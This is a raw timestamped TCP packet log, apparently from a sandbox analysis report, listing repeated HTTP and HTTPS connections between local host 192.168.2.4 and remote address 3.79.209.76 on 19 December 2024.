                                                              Dec 19, 2024 22:40:07.273132086 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.273159027 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.274977922 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.275051117 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.275108099 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.319066048 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.378592014 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.378676891 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.378865957 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.379256010 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.379534960 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.379597902 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.380872965 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.381414890 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.381475925 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.381525993 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.382977962 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.383038998 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.383203030 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.384598970 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.384661913 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.385214090 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.386070013 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.386131048 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.386213064 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.387569904 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.387634039 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.387687922 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.389066935 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.389144897 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.389180899 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.390638113 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.390690088 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.390697956 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.391971111 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.392031908 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.392117977 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.393444061 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.393506050 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.393558979 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.395056963 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.395123005 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.395181894 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.396231890 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.396292925 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.396363974 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.397694111 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.397799015 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.397809982 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.399068117 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.399144888 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.399146080 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.400429964 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.400494099 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.400542021 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.401762962 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.401819944 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.401871920 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.403143883 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.403204918 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.403286934 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.404550076 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.404611111 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.404659033 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.405900955 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.405962944 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.405981064 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.407258987 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.407331944 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.407447100 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.408626080 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.408687115 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.408740997 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.409950018 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.410027027 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.410089016 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.411309004 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.411372900 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.411433935 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.412702084 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.412775040 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.412928104 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.414195061 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.414227962 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.414256096 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.415467024 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.415529013 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.415613890 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.416884899 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.416949034 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.417032957 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.418324947 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.418384075 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.418394089 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.419608116 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.419670105 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.419751883 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.420964956 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.421042919 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.421123981 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.422354937 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.422411919 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.422472000 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.422540903 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.422785044 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.543401003 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.991602898 CET49732443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.991712093 CET443497323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.991849899 CET49732443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:08.013987064 CET49732443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:08.014034033 CET443497323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:09.495292902 CET443497323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:09.495409966 CET49732443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:09.553627968 CET49732443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:09.553693056 CET443497323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:09.554148912 CET443497323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:09.555377007 CET49732443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:09.559035063 CET49732443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:09.599375010 CET443497323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:10.184269905 CET443497323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:10.184345007 CET443497323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:10.184364080 CET49732443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:10.184432983 CET443497323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:10.184469938 CET49732443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:10.184493065 CET49732443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:10.184495926 CET443497323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:10.184552908 CET49732443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:10.184621096 CET49732443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:10.184649944 CET443497323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:10.304645061 CET49733443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:10.304686069 CET443497333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:10.304764986 CET49733443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:10.304997921 CET49733443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:10.305005074 CET443497333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:11.706248045 CET443497333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:11.706335068 CET49733443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:11.707102060 CET49733443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:11.707113028 CET443497333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:11.709404945 CET49733443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:11.709409952 CET443497333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:12.459625959 CET443497333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:12.459683895 CET443497333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:12.459703922 CET49733443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:12.459728003 CET443497333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:12.459743977 CET49733443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:12.459773064 CET49733443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:12.459779024 CET443497333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:12.459829092 CET49733443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:12.459858894 CET443497333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:12.459909916 CET49733443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:12.460309982 CET49733443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:12.460326910 CET443497333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:12.588805914 CET49734443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:12.588898897 CET443497343.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:12.589042902 CET49734443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:12.589551926 CET49734443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:12.589589119 CET443497343.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:14.026226997 CET443497343.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:14.026341915 CET49734443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:14.027124882 CET49734443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:14.027158976 CET443497343.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:14.029455900 CET49734443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:14.029489994 CET443497343.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:14.719434023 CET443497343.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:14.719492912 CET443497343.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:14.719511986 CET49734443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:14.719578028 CET443497343.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:14.719615936 CET49734443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:14.719628096 CET443497343.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:14.719635963 CET49734443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:14.719675064 CET49734443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:14.719789028 CET49734443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:14.719818115 CET443497343.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:14.836098909 CET49735443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:14.836139917 CET443497353.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:14.836230040 CET49735443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:14.836474895 CET49735443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:14.836487055 CET443497353.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:16.227180004 CET443497353.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:16.227304935 CET49735443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:16.228070021 CET49735443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:16.228079081 CET443497353.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:16.230443001 CET49735443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:16.230447054 CET443497353.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:16.945818901 CET443497353.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:16.945858955 CET443497353.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:16.945938110 CET443497353.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:16.946068048 CET49735443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:16.946068048 CET49735443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:16.946336031 CET49735443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:16.946350098 CET443497353.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:17.054722071 CET49736443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:17.054749966 CET443497363.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:17.054852009 CET49736443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:17.055049896 CET49736443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:17.055063009 CET443497363.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:18.444662094 CET443497363.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:18.444746017 CET49736443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:18.445255041 CET49736443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:18.445264101 CET443497363.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:18.447117090 CET49736443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:18.447122097 CET443497363.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:19.138957024 CET443497363.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:19.139019012 CET443497363.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:19.139043093 CET49736443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:19.139056921 CET443497363.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:19.139076948 CET49736443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:19.139132977 CET49736443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:19.139137030 CET443497363.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:19.139166117 CET443497363.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:19.139214993 CET49736443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:19.139401913 CET49736443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:19.139415026 CET443497363.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:19.258213043 CET49737443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:19.258304119 CET443497373.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:19.258384943 CET49737443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:19.258666992 CET49737443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:19.258706093 CET443497373.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:20.642231941 CET443497373.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:20.642846107 CET49737443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:20.645235062 CET49737443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:20.645235062 CET49737443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:20.645268917 CET443497373.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:20.645312071 CET443497373.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:21.341567993 CET443497373.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:21.341593981 CET443497373.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:21.341646910 CET443497373.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:21.341680050 CET49737443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:21.341742992 CET49737443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:21.341909885 CET49737443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:21.341949940 CET443497373.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:21.445475101 CET49739443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:21.445595980 CET443497393.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:21.445735931 CET49739443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:21.445965052 CET49739443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:21.446002960 CET443497393.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:22.827651024 CET443497393.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:22.827754974 CET49739443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:22.829616070 CET49739443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:22.829647064 CET443497393.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:22.831804991 CET49739443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:22.831816912 CET443497393.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:23.519659996 CET443497393.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:23.519697905 CET443497393.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:23.519793034 CET443497393.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:23.519876957 CET49739443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:23.519911051 CET49739443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:23.520195961 CET49739443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:23.520215034 CET443497393.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:23.633315086 CET49743443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:23.633400917 CET443497433.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:23.633652925 CET49743443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:23.634049892 CET49743443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:23.634099960 CET443497433.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:25.024657011 CET443497433.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:25.024847031 CET49743443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:25.025470018 CET49743443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:25.025513887 CET443497433.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:25.033451080 CET49743443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:25.033463955 CET443497433.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:25.720798016 CET443497433.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:25.720897913 CET443497433.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:25.720954895 CET49743443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:25.721000910 CET443497433.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:25.721107006 CET49743443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:25.721107006 CET49743443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:25.721143007 CET443497433.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:25.721551895 CET49743443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:25.721570015 CET443497433.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:25.721596956 CET49743443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:25.858596087 CET49745443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:25.858628035 CET443497453.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:25.858726978 CET49745443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:25.859081984 CET49745443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:25.859097004 CET443497453.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:27.243808985 CET443497453.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:27.243887901 CET49745443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:27.244446993 CET49745443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:27.244455099 CET443497453.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:27.253792048 CET49745443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:27.253798008 CET443497453.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:27.940064907 CET443497453.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:27.940126896 CET443497453.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:27.940222025 CET49745443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:27.940247059 CET443497453.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:27.940294027 CET443497453.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:27.940345049 CET49745443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:27.941926003 CET49745443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:27.941943884 CET443497453.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:28.102485895 CET49747443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:28.102511883 CET443497473.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:28.102623940 CET49747443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:28.102937937 CET49747443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:28.102950096 CET443497473.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:29.491934061 CET443497473.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:29.492039919 CET49747443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:29.492602110 CET49747443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:29.492610931 CET443497473.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:29.499057055 CET49747443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:29.499063015 CET443497473.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:30.184189081 CET443497473.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:30.184243917 CET443497473.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:30.184279919 CET49747443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:30.184294939 CET443497473.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:30.184304953 CET49747443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:30.184339046 CET49747443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:30.184343100 CET443497473.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:30.184387922 CET49747443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:30.184420109 CET443497473.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:30.184468031 CET49747443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:30.184578896 CET49747443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:30.184596062 CET443497473.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:30.289706945 CET49748443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:30.289813995 CET443497483.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:30.290059090 CET49748443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:30.290321112 CET49748443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:30.290350914 CET443497483.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:31.678674936 CET443497483.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:31.678880930 CET49748443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:31.679661989 CET49748443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:31.679670095 CET443497483.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:31.702399969 CET49748443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:31.702404976 CET443497483.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:32.389193058 CET443497483.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:32.389223099 CET443497483.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:32.389290094 CET443497483.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:32.389421940 CET49748443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:32.389719009 CET49748443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:32.389780045 CET443497483.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:32.508699894 CET49749443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:32.508794069 CET443497493.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:32.508903980 CET49749443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:32.509208918 CET49749443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:32.509244919 CET443497493.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:33.898730040 CET443497493.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:33.898839951 CET49749443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:33.899420023 CET49749443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:33.899447918 CET443497493.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:33.902108908 CET49749443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:33.902122021 CET443497493.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:34.592869997 CET443497493.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:34.592930079 CET443497493.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:34.593024969 CET49749443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:34.593096972 CET443497493.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:34.593135118 CET443497493.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:34.593136072 CET49749443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:34.593162060 CET49749443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:34.593206882 CET49749443192.168.2.43.79.209.76
